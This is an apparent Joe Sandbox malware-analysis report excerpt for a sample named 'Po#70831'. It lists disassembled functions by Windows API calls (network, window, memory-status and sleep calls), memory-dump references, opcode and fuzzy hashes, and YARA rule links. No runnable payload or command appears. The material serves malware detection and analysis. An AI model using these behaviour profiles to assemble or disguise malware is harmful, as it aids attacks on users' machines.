                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 004ED86C
                                      • GetDC.USER32(00000000), ref: 004ED876
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004ED882
                                      • ReleaseDC.USER32(?), ref: 004ED8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: 260a9ec7353406d20f39b2f68ed12173c632f8906cbad0999743cdc8e63f5cce
                                      • Instruction ID: 14ae9a2b61e9d9f0825450b31b43bc2f92e3e31471a646b30e40245b367f3074
                                      • Opcode Fuzzy Hash: 260a9ec7353406d20f39b2f68ed12173c632f8906cbad0999743cdc8e63f5cce
                                      • Instruction Fuzzy Hash: EDE0EEB5C00200EFCB60AFA4980866DBFB1AF29710B108009E80AE7251CB38690AAF84
                                      Function 00504D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00497620: _wcslen.LIBCMT ref: 00497625
                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00504ED4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Connection_wcslen
                                      • String ID: *$LPT
                                      • API String ID: 1725874428-3443410124
                                      • Opcode ID: c5ca85b4182606ef94738e2314ff94f5a1d9f048beb54f8ef04dc9e1b52d0d32
                                      • Instruction ID: 862dd2a9f520d6b4e630fb586be5033b0958d7ef9d492190faf7016808bd4750
                                      • Opcode Fuzzy Hash: c5ca85b4182606ef94738e2314ff94f5a1d9f048beb54f8ef04dc9e1b52d0d32
                                      • Instruction Fuzzy Hash: 7C916DB5A002059FCB14DF59C484EAEBBF5BF44308F198099E90A9B3A2D735ED85CF91
                                      Function 00517771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(004E569E,00000000,?,0052CC08,?,00000000,00000000), ref: 005178DD
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • CharUpperBuffW.USER32(004E569E,00000000,?,0052CC08,00000000,?,00000000,00000000), ref: 0051783B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper$_wcslen
                                      • String ID: <sU
                                      • API String ID: 3544283678-3441642152
                                      • Opcode ID: 39201311c51826b0345be7ae2c4848c48fb5f33b2f31a4aa14d2f6584431ea5b
                                      • Instruction ID: 2a0989e5bf131fc8c7e14484117b798a163706f09865d7d89f34943b4740be37
                                      • Opcode Fuzzy Hash: 39201311c51826b0345be7ae2c4848c48fb5f33b2f31a4aa14d2f6584431ea5b
                                      • Instruction Fuzzy Hash: 07616D72914118AADF04EBA9CC91DFDBB78BF18708F44453AF542A3091EB385A49CBA4
                                      Function 004AE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #
                                      • API String ID: 0-1885708031
                                      • Opcode ID: 6b3c7b10a0d925cf7ea7a04cd1ee38cb67a083e788fd9c7afb27337645da828d
                                      • Instruction ID: 862b493c81fd277e023e29ff73b395920f08ac8ffc1edf24d9b192e6f21475a9
                                      • Opcode Fuzzy Hash: 6b3c7b10a0d925cf7ea7a04cd1ee38cb67a083e788fd9c7afb27337645da828d
                                      • Instruction Fuzzy Hash: A3510436500286DFDF15DF2BC4416BA7BA4EF66311F24409BECA19B390D6389D43CB59
                                      Function 004AF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 004AF2A2
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 004AF2BB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: cd9fd2a60d9c70a6205634f542204968ada91970d49714345a9a186611a56cc6
                                      • Instruction ID: ef5f953456c4bc85c28f4127e1b0c309a04b46a493ea808badad10c535cf18bc
                                      • Opcode Fuzzy Hash: cd9fd2a60d9c70a6205634f542204968ada91970d49714345a9a186611a56cc6
                                      • Instruction Fuzzy Hash: 6A5188724187449BD720AF11DC86BAFBBF8FF85308F81485DF1D941099EB708529CB6A
                                      Function 00515745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005157E0
                                      • _wcslen.LIBCMT ref: 005157EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper_wcslen
                                      • String ID: CALLARGARRAY
                                      • API String ID: 157775604-1150593374
                                      • Opcode ID: c94b1df13eaaf75b92e434515274cf24ed78c56845ba82c2680d2548eb72ff37
                                      • Instruction ID: bba6d3435dfa3b1ff6352ec9e40ed64c8513e64f9cb6c362814f48dfb68d5336
                                      • Opcode Fuzzy Hash: c94b1df13eaaf75b92e434515274cf24ed78c56845ba82c2680d2548eb72ff37
                                      • Instruction Fuzzy Hash: BB417D31A00109EFDB14EFA9C8819EEBFB5FF99354F20406EE515A7291E7349D81CB94
                                      Function 0050D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0050D130
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0050D13A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CrackInternet_wcslen
                                      • String ID: |
                                      • API String ID: 596671847-2343686810
                                      • Opcode ID: c1d8250309a43772bf9c16db00b5e0f8b52bba0c28f41f3b138f0ec43d27fa0f
                                      • Instruction ID: 65a2200652d0dfd91beaf6becc415d665969b8fa2ce86fe7395e16bcc94eed2a
                                      • Opcode Fuzzy Hash: c1d8250309a43772bf9c16db00b5e0f8b52bba0c28f41f3b138f0ec43d27fa0f
                                      • Instruction Fuzzy Hash: 37312C71D00209ABCF15EFA5CC85AEEBFB9FF04344F00002AF815A6162DB35AA16DB64
                                      Function 0052356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 00523621
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0052365C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 1e83ec2f7e966cb5d3b14b921bf7290a3d1d8b0cf16d4eeac748d4c8690c372e
                                      • Instruction ID: 6338f294998f2cee55177d91a8cd81ba9f092a69734c6b283fba9679c64de517
                                      • Opcode Fuzzy Hash: 1e83ec2f7e966cb5d3b14b921bf7290a3d1d8b0cf16d4eeac748d4c8690c372e
                                      • Instruction Fuzzy Hash: FB31AF71100614AADB20DF68EC80EBB7BA9FF99724F00861DF8A597280DA34AD81D760
                                      Function 00524537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0052461F
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00524634
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: 12e95f03aedfb1e31d3fdf148e5b42eae2a728a60ed1445616cdb9741bb2555f
                                      • Instruction ID: 2dab6a5ce624938f94f1e8e846696d976a348fb745c06472ef01375d8e7233ae
                                      • Opcode Fuzzy Hash: 12e95f03aedfb1e31d3fdf148e5b42eae2a728a60ed1445616cdb9741bb2555f
                                      • Instruction Fuzzy Hash: 67313974A003199FDF14CFA9D980BEA7BB5FF0A300F14406AE905AB381D770A941DF90
                                      Function 005231EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0052327C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00523287
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 72848526659f4bc1ad5674757c4498976faccf2bacc6113200f46e8c09d36e52
                                      • Instruction ID: 79f369f2572df1589909b284878aefec88a4b765ca156afb52ea0def92683530
                                      • Opcode Fuzzy Hash: 72848526659f4bc1ad5674757c4498976faccf2bacc6113200f46e8c09d36e52
                                      • Instruction Fuzzy Hash: CF11D075300218AFEF219E94EC84EBB3F6AFF9A364F100129F918AB2D0D6359D519760
                                      Function 00523710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0049600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                        • Part of subcall function 0049600E: GetStockObject.GDI32(00000011), ref: 00496060
                                        • Part of subcall function 0049600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      • GetWindowRect.USER32(00000000,?), ref: 0052377A
                                      • GetSysColor.USER32(00000012), ref: 00523794
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 4045bbb24fe07e40e6e5f6aff9df29747bc2a51f869d76227208781010361a5b
                                      • Instruction ID: 58aed0c6f51320be80fbfefb1acbbff5e9403e63599a552f1ec5815eeacb2ffd
                                      • Opcode Fuzzy Hash: 4045bbb24fe07e40e6e5f6aff9df29747bc2a51f869d76227208781010361a5b
                                      • Instruction Fuzzy Hash: D01147B261021AAFDF00DFA8DC45AEA7BB8FF09304F044914F955E2291E774E9119B50
                                      Function 0050CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050CD7D
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0050CDA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: f0b0614b063bbf4287ab3fadaad9319ce2203f642a5b899d5e44496e308f822e
                                      • Instruction ID: c34bd4b6cc1859d647020a3ee679e5b738d2a8509f2e5d40b62963bbc7f8c145
                                      • Opcode Fuzzy Hash: f0b0614b063bbf4287ab3fadaad9319ce2203f642a5b899d5e44496e308f822e
                                      • Instruction Fuzzy Hash: AC11A3722156717AD7344B668C85EEBBE6CFF137A4F00472AB109831C0D6609845D6F0
                                      Function 00523429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 005234AB
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005234BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: edbb2d8445169ecb3f5920711e62cd4653c90184483e62dbcfcca7aa09b6bdb0
                                      • Instruction ID: 58d7fa2b75a558e6869f46c0ec3e933d4a7bdd63679c4bc5d767cd7b6dfeea82
                                      • Opcode Fuzzy Hash: edbb2d8445169ecb3f5920711e62cd4653c90184483e62dbcfcca7aa09b6bdb0
                                      • Instruction Fuzzy Hash: B811B271100118ABEF115E64EC48ABB3F69FF16374F504764F960971D0C779EC519B90
                                      Function 004F6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • CharUpperBuffW.USER32(?,?,?), ref: 004F6CB6
                                      • _wcslen.LIBCMT ref: 004F6CC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: STOP
                                      • API String ID: 1256254125-2411985666
                                      • Opcode ID: 0ec5a384261ab6282d3c356e5ce2fa253769861a78867a17ac7aa6376f663379
                                      • Instruction ID: 6073c1f68e2234b35ddcea74105d074aaa873b077f4aeff7b41736119d4864e3
                                      • Opcode Fuzzy Hash: 0ec5a384261ab6282d3c356e5ce2fa253769861a78867a17ac7aa6376f663379
                                      • Instruction Fuzzy Hash: D6012B3261052A8BCB209FBDDC408BF37B4FF61714702053FE96293295EB39D800C654
                                      Function 004F1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                        • Part of subcall function 004F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 004F3CCA
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 004F1C46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
